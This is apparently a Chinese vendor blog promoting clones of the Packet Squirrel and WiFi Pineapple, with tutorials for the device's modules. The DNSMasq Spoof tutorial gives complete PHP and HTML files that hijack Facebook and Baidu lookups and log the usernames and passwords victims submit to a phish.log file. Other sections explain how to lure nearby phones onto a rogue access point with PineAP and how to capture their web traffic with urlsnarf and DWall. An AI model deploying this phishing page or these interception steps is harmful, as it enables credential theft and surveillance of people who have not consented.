极客酷玩新玩具-Packet Squirrel 小松鼠

话不多说,先上图~~~

 

 

为了方便国内玩家学习研究这款设备,极客酷玩推出了国内版Packet Squirrel,硬件配置与hak5 版保持一致,功能完全一致,并且采用了全金属外壳打造,提升了设备的质感,以诚意的价格提供给国内的极客玩家,让喜欢研究硬件设备的玩家都能有机会研究好玩的硬件产品。

产品链接:https://item.taobao.com/item.htm?spm=a1z38n.10677092.0.0.3f741b1ah1NmT&id=563912184071

网络中间人新玩具:Packet Squirrel(小松鼠)

Packet Squirrel是一款由Hak5 社区最新推出的超便携中间人工具。

这款多功能的以太网工具支持远程访问、自动抓包、DNS重定向、以及安全的VPN连接。更多功能可通过官方提供的 Payloads 插件包来进行扩展。

它的特点是体积超小,尺寸只有半张银行卡的大小,快速部署,即插即用,功能可快速切换。适合网络管理员、网络数据分析测试、隐私保护等等。

 

详情可访问:https://www.hak5.org/gear/packet-squirrel

极客酷玩近期会推出国产版的Packet Squirrel,相同的配置,一样的功能,厚道的价格,感兴趣可以关注下。

 

wifi pineapple 插件使用之DNSMasq Spoof

这个插件可以实现dns 重定向,将指定域名重定向到菠萝的网关 172.16.42.1 上。

1. 指定需要重定向的域名,这里用baidu 和 facebook 举例

可以再加两行

172.16.42.1 www.facebook.com

172.16.42.1 www.baidu.com

这样,baidu.com  和 www.baidu.com  两种域名都可以被重定向

2. 编辑菠萝网关展示的页面,文件位于/www 这下,需要添加的网页文件为

index.php    redirect.php    error.php    facebook.html    baidu.html

这几个文件的内容为

index.php

<html>
<head>
<meta http-equiv="REFRESH" content="0;url=redirect.php">
</head>
<body>
</body>
</html>

redirect.php

<?php
$ref = $_SERVER['HTTP_REFERER'];
if (strpos($ref, "facebook")) { header('Location: facebook.html'); }
if (strpos($ref, "baidu")) { header('Location: baidu.html'); }
require('error.php');
?>

error.php

<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
$nam = stripslashes($_POST['name']);
$pas = stripslashes($_POST['pass']);
$nam = htmlspecialchars($nam, ENT_QUOTES);
$pas = htmlspecialchars($pas, ENT_QUOTES);
$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
$filed = @fopen("pineapple/phish.log", "a+");
@fwrite($filed, "$content\n");
@fclose($filed);
}
?>

<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body onload="goBack()">
</body></html>

facebook.html 

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>facebook</title>
</head>
<body>
<p>this is facebook web page.</p>
</body>
</html>

baidu.html

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>百度</title>
</head>
<body>
<p>this is baidu web page.</p>
</body>
</html>

3. 点击Start开启 dnsmasq spoof

4. 测试

可以先ping一下baidu.com  和 facebook.com,可以发现ping这两个域名返回的ip都是网关的IP 172.16.42.1

在浏览器中输入 baidu.com,就可以显示baidu.html网页文件的内容,当然,这里可以替换成你想要展示的内容。如果没有展示,可能是浏览器缓存的原因,清除浏览器缓存再试一下。

 

 

wifipineapple使用之PineAP模块

PineAP 模块是wifipineapple 一个重要的功能,是菠萝区别于其他设备的主要功能,如果你知道karma,就知道这个模块是实现什么功能了。简单来说,它可以强制使附近的客户端连接到菠萝的wifi ,而不需要用户去主动连接。实现的原理,感兴趣可以去搜一下,这里只介绍使用方法。

  • 旧款白色版菠萝

1)菠萝通过有线联网,这种情况比较简单,只需要一个功率稍大的网卡就可以,比如RT3070、RTL8187、AR9271芯片的网卡,推荐带外置天线的RT3070、AR9271(TL-WN722N)的网卡

2)菠萝通过无线桥接方式联网,这种就需要两个网卡,一个用来无线桥接其他wifi 热点,一个用来实现PineAP的功能(使用第一种情况的功率稍大的网卡),一个USB HUB,用来扩展菠萝的USB接口,使其可以插两个USB无线网卡。

  • 新款黑色版菠萝

黑色版菠萝内置了两张网卡,包括一个AR9271 网卡,所以如果是用有线联网,可以直接使用内部的AR9271 网卡(wlan1),如果是无线桥接联网,可以外接一个网卡来无线桥接,然后使用内置的网卡wlan1 来实现PineAP的功能。

这里介绍使用无线桥接联网的情况。

操作步骤:

无线桥接使用wlan2 来进行,PineAP使用wlan1 来执行

3.  打开PineAP,先使能PineAP Daemon,点击Switch,使能PineAP Daemon

4. 然后,勾选相关选项,再点击 Save PineAP Setting ,保存选项

此时,PineAP 已经启动,可以在Logging 里查看PineAP 的日志,如果有客户端连接上来,也可以在Client 里看到。

 

 

wifi pineapple插件使用之urlsnarf

urlsnarf 顾名思义 就是可以抓取客户端所有的URL 请求,包括http GET 或者 POST的数据都可以看到。

网络接口选择br-lan,然后点击Start 就启动了。

手机连接菠萝的WiFi ,随便打开一些APP 应用,就可以看到http 请求的URL数据了。

 

wifipineapple插件使用之DWall

DWall 是一款可以实时抓取http 数据的插件,并且可以实时展示在web页面,它的另外一个名称叫绵羊墙。

使用非常简单,在线下载插件之后,点击Enable ,然后点击Starting Listening就可以打开了。

只要手机连接上菠萝的wifi 热点之后,所有http请求都会被抓取。

这里有一个比较实用的功能,现在很多在线视频都无法下载,尤其是手机上的在线视频,比如今日头条里的视频,是无法直接下载的,因为拿不到视频文件的真正链接,但连上菠萝之后,在DWall 里就可以直接获取到视频的真实链接,通过此链接就可以下载一些自己喜欢的视频。

wifipineapple 中国版wifi pineapple 介绍

wifipineapple 由国外 hak5 社区原创,是一款无线安全审计设备。WiFi Pineapple 拥有一个完全重新设计的Web界面。新的WiFi Pineapple的Web界面更加直观、快速、灵敏和熟悉。模块仍然是一个核心功能,可无线下载社区开发的附加组件和网络前端的流行工具。

中国版wifipineapple,硬件配置与官方 版一致,内置双网卡,外置双天线, 外形小巧,便携性极佳,适合多种环境下使用。

硬件介绍:cpu 为高通 SOC,内存 RAM 为 64MB DDR2,ROM 空间为 16MB,硬件接口有 1 个 usb 接口,可 接 usb 无线网卡,u 盘以及其他 USB 设备,1 个 Micro SD 卡接口,用来扩展 ROM 空间。1 个 micro usb 接口,用来给电池充电。1 个网口,可用来进行联网。

wifipineapple 是一款极佳的无线安全研究工具,以其灵活的用途,简单易用的特点,深受国内外无线安全研究者的喜爱。

https://item.taobao.com/item.htm?id=559668305060